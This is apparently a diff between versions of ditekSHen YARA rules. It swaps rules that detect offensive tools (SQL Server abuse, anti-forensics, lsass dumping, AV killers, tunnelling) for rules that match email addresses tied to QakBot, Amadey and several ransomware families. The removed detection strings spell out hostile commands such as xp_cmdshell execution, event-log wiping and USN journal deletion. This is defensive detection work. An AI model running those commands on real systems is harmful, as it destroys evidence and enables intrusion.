-		logic_hash = "784dbc518cf9492557c9b3536256c4a9b03e4536cf7cee7e764b8009dd4686bb"
+		logic_hash = "fd47a1d996c78a6efc144f0fe0a28951c34becab3101e7d25acc980bb6b9f8ce"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
 
 	strings:
-		$s1 = "ConvertDLLToSQLBytes" ascii
-		$s2 = "\\SQLRecon.pdb" ascii
-		$s3 = "GetAllSQLServerInfo" ascii
-		$s4 = "<GetMSSQLSPNs>b__" ascii
-		$s5 = "select 1; exec master..xp_cmdshell" wide
-		$s6 = "-> Command Execution" wide
-		$s7 = ";EXEC dbo.sp_add_jobstep @job_name =" wide
-		$s8 = "EXEC sp_drop_trusted_assembly 0x" wide
-		$s9 = "(&(sAMAccountType=805306368)(servicePrincipalName=MSSQL*))" wide
+		$s1 = "skarabeyllc@gmail.com" ascii wide nocase
+		$s2 = "admin@intell-it.ru" ascii wide nocase
+		$s3 = "support@pro-kon.ru" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 5 of them
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Atlasreaper : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Qakbot : FILE
 {
 	meta:
-		description = "Detects AtlasReaper command-line tool for Confluence and Jira reconnaissance, credential farming and social engineering"
-		author = "ditekSHen"
-		id = "a0b4e134-bb05-5cc3-af71-516a0407aa1b"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects QakBot executables with specific email addresses found in the code signing certificate"
+		author = "ditekShen"
+		id = "24ad36b2-5022-5f72-b01c-fbb64da20f34"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1438-L1453"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L23-L37"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4a0436d5c3f1609d23b2b919bebdc56a7fd63e81b99e72dcda1022487cb88240"
+		logic_hash = "7a38069b3b553cba1a789dac706638382dae5bb748b0c10ef50138879767b6dd"
 		score = 75
-		quality = 25
+		quality = 61
 		tags = "FILE"
 
 	strings:
-		$s1 = "/((?:A3T[A-Z0-9]|AKIA|AGPA|AIDA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})/" fullword wide
-		$s2 = "/rest/api/3/search?jql=" fullword wide
-		$s3 = "attachments+IS+NOT+EMPTY&fields=attachment,summary,status" fullword wide
-		$s4 = "<ParseJira>b__" ascii
-		$s5 = "<Atlas_Doc_Format>k__" ascii
-		$s6 = "<ParseConfluence>b__" ascii
-		$s7 = "AtlasReaper_ProcessedByFody" fullword ascii
-		$s8 = /AtlasReaper\.(Jira|Confluence)/ fullword ascii
+		$s1 = "hutter.s94@yahoo.com" ascii wide nocase
+		$s2 = "andrej.vrear@aol.com" ascii wide nocase
+		$s3 = "klaus.pedersen@aol.com" ascii wide nocase
+		$s4 = "a.spendl@aol.com" ascii wide nocase
+		$s5 = "mjemec@aol.com" ascii wide nocase
+		$s6 = "robert.sijanec@yahoo.com" ascii wide nocase
+		$s7 = "mitja.vidovi@aol.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Ngroksharp : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Amadey : FILE
 {
 	meta:
-		description = "Detects NgrokSharp .NET library for Ngrok"
-		author = "ditekSHen"
-		id = "7c335021-4afd-5878-83c3-9bb2c81f3586"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects Amadey executables with specific email addresses found in the code signing certificate"
+		author = "ditekShen"
+		id = "f9abbf1d-2077-52a8-bfb0-df3732649624"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1455-L1471"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L39-L47"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c60637177114d369af9c3e96689811845ce1c1dfde8f7f971c4de21439564b4b"
+		logic_hash = "3df3fe67835f76e51743b1b4fa2cbc48277d82689c2fc27457b4d7d820e56e43"
 		score = 75
-		quality = 50
+		quality = 73
 		tags = "FILE"
 
 	strings:
-		$x1 = "NgrokSharp" fullword wide
-		$x2 = "/entvex/NgrokSharp" ascii
-		$s1 = "start --none -region" wide
-		$s2 = "startTunnelDto" fullword wide
-		$s3 = "/tunnels/" fullword wide
-		$s4 = "<StartNgrok" ascii
-		$s5 = "INgrokManager" ascii
-		$s6 = "_tunnel_name" ascii
-		$s7 = "_ngrokDownloadUrl" ascii
+		$s1 = "tochka.director@gmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 3 of ( $s* ) ) or 4 of ( $* ) )
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Ngrokgo : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_UNK01 : FILE
 {
 	meta:
-		description = "Detects Go implementation variant for Ngrok"
-		author = "ditekSHen"
-		id = "b11f67c5-846d-57b2-8edc-521b2dc77503"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects Amadey executables with specific email addresses found in the code signing certificate"
+		author = "ditekShen"
+		id = "56e83bfb-e17d-5d27-87fa-e275cc540148"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1473-L1488"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L49-L58"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4ec151661e3af922aba202c68392a2af17e2c4ed25a71a0b5aacc13fbfcc5c53"
+		logic_hash = "d85461f74186fcabcbf7f2bc1dce06b0012c504cf3235a6fc3e1499dc6f8a3ee"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
+		hash1 = "37d08a64868c35c5bae8f5155cc669486590951ea80dd9da61ec38defb89a146"
 
 	strings:
-		$s1 = "/codegangsta/inject" fullword wide
-		$s2 = "go.ngrok.com/" ascii
-		$s3 = "GetIsNgrokDomain" ascii
-		$s4 = "GetNgrokMetering" ascii
-		$s5 = "*cli.ngrokService" ascii
-		$s6 = "GetAllowNgrokLink" ascii
-		$s7 = "ngrok {{.Name}}{{if .Flags}}" ascii
-		$s8 = "github.com/nikolay-ngrok/" ascii
+		$s1 = "etienne@tetracerous.br" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		uint16( 0 ) == 0x5a4d and any of them
 }
-rule DITEKSHEN_INDICATOR_Tool_Forensia : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Lockergoga
 {
 	meta:
-		description = "Detects Forensia anti-forensics tool used for erasing footprints"
-		author = "ditekSHen"
-		id = "bcd05c2e-7ddd-5ce7-a6a7-0659bed38744"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with LockerGoga ransomware"
+		author = "ditekShen"
+		id = "ff257dae-d09b-52b3-93ca-68a560231b0d"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1490-L1523"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L60-L80"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7147eee62df10cd8a6c00ec80c4d1bdb8234a181dd6af81d0580d847f05bd0b6"
+		logic_hash = "f3474f92d935dda0d4c3b11b6934aede69ed949c8ba4d196bfe320476d39ac36"
 		score = 75
-		quality = 73
-		tags = "FILE"
+		quality = 49
+		tags = ""
 
 	strings:
-		$c1 = "for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"" ascii
-		$c2 = "del /F /Q C:\\Windows\\Prefetch\\*" ascii
-		$c3 = "del C:\\Windows\\AppCompat\\Programs\\RecentFileCache.bcf" ascii
-		$c4 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\*" ascii
-		$c5 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" ascii
-		$c6 = "del /F /Q %APPDATA%\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\*" ascii
-		$c7 = "fsutil.exe usn deletejournal /D C:" ascii
-		$r1 = "\\Memory Management\\PrefetchParameters" wide
-		$r2 = "\\Explorer\\Advanced" wide
-		$r3 = "\\Services\\EventLog" wide
-		$r4 = "\\Shell\\BagMRU" wide
-		$r5 = "\\Control\\FileSystem" wide
-		$r6 = "\\Setup\\VC" wide
-		$s1 = "[LOG] - %s" wide
-		$s2 = "\\forensia\\regedit.hpp" wide
-		$s3 = "NtfsDisableLastAccessUpdate" wide
-		$s4 = "Melting The Executable" wide
-		$s5 = "Sysmon Unloader" wide
-		$s6 = "Rundll32.exe apphelp.dll,ShimFlushCache" ascii
-		$s7 = "\\Debug\\forensia.pdb" ascii
-		$s8 = { 55 00 00 00 aa 00 00 00 92 49 24 00 49 24 92 00
-                24 92 49 00 00 00 00 00 11 00 00 00 22 00 00 00
-                33 00 00 00 44 00 00 00 66 00 00 00 88 00 00 00
-                99 00 00 00 bb 00 00 00 cc 00 00 00 dd 00 00 00
-                ee 00 00 00 ff 00 00 00 6d b6 db 00 b6 db 6d 00
-                db 6d b6 }
+		$s1 = "abbschevis@protonmail.com" nocase ascii wide
+		$s2 = "aperywsqaroci@o2.pl" nocase ascii wide
+		$s3 = "asuxidoruraep1999@o2.pl" nocase ascii wide
+		$s4 = "dharmaparrack@protonmail.com" nocase ascii wide
+		$s5 = "ijuqodisunovib98@o2.pl" nocase ascii wide
+		$s6 = "mayarchenot@protonmail.com" nocase ascii wide
+		$s7 = "mikllimiteds@gmail.com0" nocase ascii wide
+		$s8 = "phanthavongsaneveyah@protonmail.com" nocase ascii wide
+		$s9 = "qicifomuejijika@o2.pl" nocase ascii wide
+		$s10 = "rezawyreedipi1998@o2.pl" nocase ascii wide
+		$s11 = "sayanwalsworth96@protonmail.com" nocase ascii wide
+		$s12 = "suzumcpherson@protonmail.com" nocase ascii wide
+		$s13 = "wyattpettigrew8922555@mail.com" nocase ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 4 of ( $c* ) and 2 of ( $r* ) ) or ( 4 of ( $r* ) and 2 of ( $c* ) ) or 6 of ( $s* ) or ( 3 of ( $s* ) and 2 of ( $r* ) and 1 of ( $c* ) ) )
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Dogzproxy : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Goldenaxe
 {
 	meta:
-		description = "Detects Dogz proxy tool"
-		author = "ditekSHen"
-		id = "de2a8d26-0e8e-5999-baca-1e43933af866"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with GoldenAxe ransomware"
+		author = "ditekShen"
+		id = "cd6486eb-742f-50fb-bd99-c5d778886477"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1525-L1537"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L82-L91"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "575cfed9cb7979216fd8fd2a05efe5dfece3a9120b4f185c015918337829ed63"
+		logic_hash = "2540da85880dc08b51a2d096cefd8ed3cb14ccd171b71b434ccf26e7c5f1b54b"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "LOGONSERVER=" fullword wide
-		$s2 = "DOGZ_E_" ascii
-		$s3 = "got handshake_id=%d" ascii
-		$s4 = "responser send connect ack" ascii
-		$s5 = "dogz " ascii
+		$s1 = "xxback@keemail.me" nocase ascii wide
+		$s2 = "darkusmbackup@protonmail.com" nocase ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Fastreverseproxy : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Getcrypt
 {
 	meta:
-		description = "Detects Fast Reverse Proxy (FRP) tool"
-		author = "ditekSHen"
-		id = "d643cc38-a96c-5353-bb46-ca46ea740e3b"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with GetCrypt ransomware"
+		author = "ditekShen"
+		id = "b5e31968-e626-5fbb-8bfe-942b48737367"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1539-L1555"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L93-L106"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c26d9e8833c7055a03a446eb983c7f70f1f18669d009ebc204dda3f0bb6048f7"
+		logic_hash = "401f4e69235873adc271f8861912ec17daaa71a798c83df8cc3a9b88520708c9"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 63
+		tags = ""
 
 	strings:
-		$x1 = "<title>frp client admin UI</title>" ascii
-		$x2 = "https://github.com/fatedier/frp" ascii
-		$s1 = ").SetLogin" ascii
-		$s2 = ").SetPing" ascii
-		$s3 = ").SetNewWorkConn" ascii
-		$s4 = ").ServeHTTP" ascii
-		$s5 = ").Middleware" ascii
-		$s6 = "frpc proxy config error:" ascii
-		$s7 = "frpc sudp visitor proxy is close" ascii
+		$s1 = "getcrypt@cock.li" nocase ascii wide
+		$s2 = "cryptget@tutanota.com" nocase ascii wide
+		$s3 = "cryptget@tutanota.com" nocase ascii wide
+		$s4 = "offtitan@pm.me" nocase ascii wide
+		$s5 = "offtitan@cock.li" nocase ascii wide
+		$s6 = "un42@protonmail.com" nocase ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( all of ( $s* ) ) )
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Gogoscan : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Cryptomix
 {
 	meta:
-		description = "Detects GoGo scan tool"
-		author = "ditekSHen"
-		id = "c24ede04-2971-55f8-8b60-ec3bdca844d7"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with CryptoMix ransomware"
+		author = "ditekShen"
+		id = "7e623d06-36e8-576d-b261-d562eccf549b"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1557-L1571"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L108-L123"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "c9fbc98a28c74bf920f5f7d62713834d18b33b5c65483a1bd42e4555764c8346"
+		logic_hash = "27b75a476229fc877c316f7a61d1ed647f5a67ac44a174d86c084063f039b20c"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 34
+		tags = ""
 
 	strings:
-		$s1 = "(conn) (scan  (scan) MB in  Value>" ascii
-		$s2 = "sweep sysmontargettelnet" ascii
-		$s3 = "%d bytes(?i) (.*SESS.*?ID)([a-z0-9])([A-Z]+)" ascii
-		$s4 = "prepareForSweep" ascii
-		$s5 = "Scanned %s with %d ports, found %d" ascii
-		$s6 = "/chainreactors/gogo/" ascii
-		$s7 = "Starting task %s ,total ports: %d , mod: %s" ascii
+		$s1 = "portstatrelea1982@protonmail.om" ascii wide nocase
+		$s2 = "unlock@eqaltech.su" ascii wide nocase
+		$s3 = "unlock@royalmail.su" ascii wide nocase
+		$s4 = "adexsin276@gmail.com" ascii wide nocase
+		$s5 = "nbactocepnyou@protonmail.com" ascii wide nocase
+		$s6 = "nunlock@eqaltech.su" ascii wide nocase
+		$s7 = "nsnlock@royalmail.su" ascii wide nocase
+		$s8 = "cersiacsofal@protonmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 6 of them
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Gogoprocdump : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Buran
 {
 	meta:
-		description = "Detects GoGo (lsass) process dump tool"
-		author = "ditekSHen"
-		id = "f92845c6-f8ae-50d0-97ea-cfa72051c2de"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with Buran ransomware"
+		author = "ditekShen"
+		id = "63cdda3f-78ed-5ce5-a8e0-e0893f2c314e"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1573-L1586"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L125-L140"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f410882e4c6c8b65e7d3c192cf94bf99d61cf54dc21d80cdf17193b34752c576"
+		logic_hash = "685126efa7f90ce296fc616bd8d5d89a5b4b9aba8b60601b29534de21a0d0015"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 59
+		tags = ""
 
 	strings:
-		$s1 = "C:\\temp" ascii
-		$s2 = "gogo" fullword ascii
-		$s3 = "/DumpLsass-master/SilentProcessExit/" ascii
-		$s4 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zone" ascii
-		$s5 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\lsass.exe" ascii
-		$s6 = "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\lsass.exe" ascii
+		$s1 = "recovery_server@protonmail.com" ascii wide nocase
+		$s2 = "recovery1server@cock.li" ascii wide nocase
+		$s3 = "polssh1@protonmail.com" ascii wide nocase
+		$s4 = "polssh@protonmail.com" ascii wide nocase
+		$s5 = "buransupport@exploit.im" ascii wide nocase
+		$s6 = "buransupport@xmpp.jp" ascii wide nocase
+		$s7 = "jacksteam2018@protonmail.com" ascii wide nocase
+		$s8 = "notesteam2018@tutanota.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Fscan : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Ransomwareexx
 {
 	meta:
-		description = "Detects GoGo scan tool"
-		author = "ditekSHen"
-		id = "3bf73853-15c1-54f7-866a-6a7632e39f19"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with RansomwareEXX Linux ransomware"
+		author = "ditekShen"
+		id = "dfcff8cb-c50c-559e-b5b9-8c2cdac7a3dc"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1588-L1602"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L142-L150"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b107eb767454c4c084a7237c107c8414bdb03c324902769ac544c5903e346e17"
+		logic_hash = "a83ada5d29c6d62a292c4b3a1379558cddcaf63d97dbdfc6afd27cc52f6f656d"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$s1 = "fscan version:" ascii
-		$s2 = "Citrix-ConfProxyCitrix-MetaframeCitrix-NetScalerCitrix-XenServerCitrix_Netscaler" ascii
-		$s3 = "(AkamaiGHost)(DESCRIPTION=(Typecho</a>)(^.+)([0-9]+)(confluence.)(dotDefender)" ascii
-		$s4 = "/fscan/" ascii
-		$s5 = "WebScan.CheckDatas" ascii
-		$s6 = "'Exploit.Test" ascii
-		$s7 = "rules:" ascii
+		$s1 = "france.eigs@protonmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 4 of them
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_BURTNCIGAR : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Phobos
 {
 	meta:
-		description = "Detects BURNTCIGAR a utility which terminates processes associated with endpoint security software"
-		author = "ditekSHen"
-		id = "b5260d7e-07ac-5633-b450-e2124cbba65b"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with Phobos ransomware"
+		author = "ditekShen"
+		id = "cee09220-4038-5190-b595-28f67c845588"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1604-L1616"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L152-L161"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4977332a0b20b300a5fc34f0f8d56221f55b66783853306d803e91701cb7e6ec"
+		logic_hash = "cf9e163d2315d465afb47bf83f30d5d27e14c4cbbc1c235dcb15b75fb509ba7d"
 		score = 75
-		quality = 75
-		tags = "FILE"
-		clamav1 = "INDICATOR.Win.TOOL.BURNTCIGAR"
+		quality = 71
+		tags = ""
 
 	strings:
-		$s1 = "Kill PID =" ascii
-		$s2 = "CreateFile Error =" ascii
-		$s3 = "\\KillAV" ascii
-		$s4 = "DeviceIoControl" ascii
+		$s1 = "helprecover@foxmail.com" ascii wide nocase
+		$s2 = "recoverhelp2020@thesecure.biz" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 3 of them
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Pplblade : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Epsilon
 {
 	meta:
-		description = "Detects PPLBlade Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk"
-		author = "ditekSHen"
-		id = "60c9b036-51a0-5e08-83de-1f69f62245c3"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with Epsilon ransomware"
+		author = "ditekShen"
+		id = "acdeb3b1-872b-5892-9dfe-2e506f767da2"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1634-L1658"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L163-L171"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "da21402b07fcd0358ba630e48ab35956cb7ed8c12836a339c85b2ee5e414543e"
+		logic_hash = "163694ed2ae181764fc6e62027487d183114be35a689dd44d4d9761149df244b"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 73
+		tags = ""
 
 	strings:
-		$x1 = "PPLBlade" ascii
-		$x2 = "/PPLBlade/" ascii
-		$x3 = "PPLBlade.exe --mode" ascii
-		$x4 = "PPLBLADE.SYSPPLBlade.dmp" ascii
-		$s1 = "Dump bytes sent at %s:%d. Protocol: %s" ascii
-		$s2 = "Deobfuscated dump saved in file %s" ascii
-		$m1 = "main.WriteDriverOnDisk" ascii
-		$m2 = "main.ProcExpOpenProc" ascii
-		$m3 = "main.miniDumpCallback" ascii
-		$m4 = "main.copyDumpBytes" ascii
-		$m5 = "main.MiniDumpGetBytes" ascii
-		$m6 = "main.SendBytesRaw" ascii
-		$m7 = "main.SendBytesSMB" ascii
-		$m8 = "main.DeobfuscateDump" ascii
-		$m9 = "main.dumpMutex" ascii
-		$m10 = "main.dbghelpDLL" ascii
-		$m11 = "main.miniDumpWriteDump" ascii
+		$s1 = "neftet@tutanota.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $x* ) or ( 1 of ( $x* ) and ( 1 of ( $s* ) or 3 of ( $m* ) ) ) or ( all of ( $s* ) and 3 of ( $m* ) ) or ( 7 of ( $m* ) ) )
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Sharpldap : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Thanos
 {
 	meta:
-		description = "Detects SharpLDAP tool written in C# that aims to do enumeration via LDAP queries"
-		author = "ditekSHen"
-		id = "597e578d-41f0-595e-b92c-0c3676d8b47a"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with Thanos ransomware"
+		author = "ditekShen"
+		id = "22ffb4c9-f113-5d3e-a466-6c384c0c6e8a"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1660-L1675"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L173-L182"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "da5db3f2907229dc68e3c6f3351361a4b1fb9fe8afc597c9dfe611f9725c6181"
+		logic_hash = "039ea384136a1aaa261702ed75ab9358aaa1ec2d5a8d35fe4789647f39490c7c"
 		score = 75
-		quality = 75
-		tags = "FILE"
+		quality = 71
+		tags = ""
 
 	strings:
-		$x1 = "SharpLDAP" ascii wide
-		$x2 = "SharpLDAP.pdb" ascii
-		$s1 = "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))" wide
-		$s2 = "(&(servicePrincipalName=*))" wide
-		$s3 = "/Enumerating (Domain|Enterprise|Organizational|Service|Members|Users|Computers)/" wide
-		$s4 = "ListMembers" fullword ascii
-		$s5 = "GroupMembers" fullword ascii
-		$s6 = "get_SamAccountName" fullword ascii
+		$s1 = "my-contact-email@protonmail.com" ascii wide nocase
+		$s2 = "get-my-data@protonmail.com" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( ( 1 of ( $x* ) and 4 of ( $s* ) ) or ( 5 of ( $s* ) ) )
+		any of them
 }
-rule DITEKSHEN_INDICATOR_TOOL_Pandora : FILE
+rule DITEKSHEN_INDICATOR_KB_ID_Ransomware_Vovalex
 {
 	meta:
-		description = "Detects Pandora tool to extract credentials from password managers"
-		author = "ditekSHen"
-		id = "3f71f24b-755f-5967-afbf-04a512bd0a19"
-		date = "2024-09-25"
-		modified = "2024-09-25"
+		description = "Detects files referencing identities associated with Vovalex ransomware"
+		author = "ditekShen"
+		id = "95e9ddce-8a19-59f1-baf4-bdac61c9c396"
+		date = "2024-01-23"
+		modified = "2024-01-23"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_tools.yar#L1677-L1691"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_id.yar#L184-L192"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dd5be3b99b62ec40c242225d9420b9ce299c4f348882b0380289309dfedbc1e8"
